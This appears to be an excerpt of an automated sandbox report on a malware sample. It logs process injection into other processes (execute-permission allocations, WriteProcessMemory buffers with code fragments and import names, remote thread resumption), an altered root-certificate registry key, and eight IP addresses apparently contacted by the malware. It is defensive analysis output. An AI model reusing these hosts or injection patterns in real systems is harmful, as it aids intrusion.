NtTerminateProcess Aug. 3, 2021, 7:43 a.m.	status_code: 0x00000000 process_identifier: 2256 process_handle: 0x0000011c	1
NtTerminateProcess Aug. 3, 2021, 7:37 a.m.	status_code: 0x00000000 process_identifier: 604 process_handle: 0x0000000000000418
NtTerminateProcess Aug. 3, 2021, 7:37 a.m.	status_code: 0x00000000 process_identifier: 604 process_handle: 0x0000000000000418	1
NtTerminateProcess Aug. 3, 2021, 7:38 a.m.	status_code: 0x00000000 process_identifier: 412 process_handle: 0x0000000000000450
NtTerminateProcess Aug. 3, 2021, 7:38 a.m.	status_code: 0x00000000 process_identifier: 412 process_handle: 0x0000000000000450	1
NtTerminateProcess Aug. 3, 2021, 7:38 a.m.	status_code: 0x00000000 process_identifier: 852 process_handle: 0x000000000000044c
NtTerminateProcess Aug. 3, 2021, 7:38 a.m.	status_code: 0x00000000 process_identifier: 852 process_handle: 0x000000000000044c	1

Communicates with host for which no DNS query was performed (8 events)

host	105.27.205.34
host	182.253.210.130
host	184.74.99.214
host	185.56.175.122
host	194.146.249.137
host	216.166.148.187
host	46.99.175.217
host	5.152.175.57

Allocates execute permission to another process indicative of possible code injection (50 out of 713 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 774144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000370000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1
NtAllocateVirtualMemory Aug. 3, 2021, 7:37 a.m.	process_identifier: 2488 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000408	1

Potential code injection by writing to the memory of another process (50 out of 1066 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGX D$\D$\ø uWHw`HkFHD$PHD$PH=u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\øÅ3Àé\ÿÿÿHD$PH=«uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHø9uLF HNHVÿëÌÿëÈHD$PHøuHNÿëµHD$PHø&GÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff2c246c process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: VERSION.dll base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: oåv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: GetFileVersionInfoA base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6ævxüþ base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: VerQueryValueA base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6ævxüþ base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: GetFileVersionInfoSizeA base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6ævxüþ base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: KERNEL32.dll base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: oåv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: GetLastError base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: EnterCriticalSection base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: LeaveCriticalSection base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: InitializeCriticalSection base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: DeleteCriticalSection base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: LoadLibraryA base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: GetProcAddress base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: HeapFree base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: HeapSize base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: HeapReAlloc base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww7 base_address: 0x00000000000a0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: HeapAlloc base_address: 0x00000000001e0000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1
WriteProcessMemory Aug. 3, 2021, 7:37 a.m.	buffer: 6æväv base_address: 0x0000000000370000 process_identifier: 2488 process_handle: 0x0000000000000408	1	1

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2888 resumed a thread in remote process 2488
Process injection	Process 2888 resumed a thread in remote process 2656
Process injection	Process 2888 resumed a thread in remote process 844
NtResumeThread Aug. 3, 2021, 7:37 a.m.	thread_handle: 0x00000000000003f4 suspend_count: 1 process_identifier: 2488	1	0	0
NtResumeThread Aug. 3, 2021, 7:37 a.m.	thread_handle: 0x000000000000042c suspend_count: 1 process_identifier: 2656	1	0	0
NtResumeThread Aug. 3, 2021, 7:38 a.m.	thread_handle: 0x000000000000041c suspend_count: 1 process_identifier: 844	1	0	0

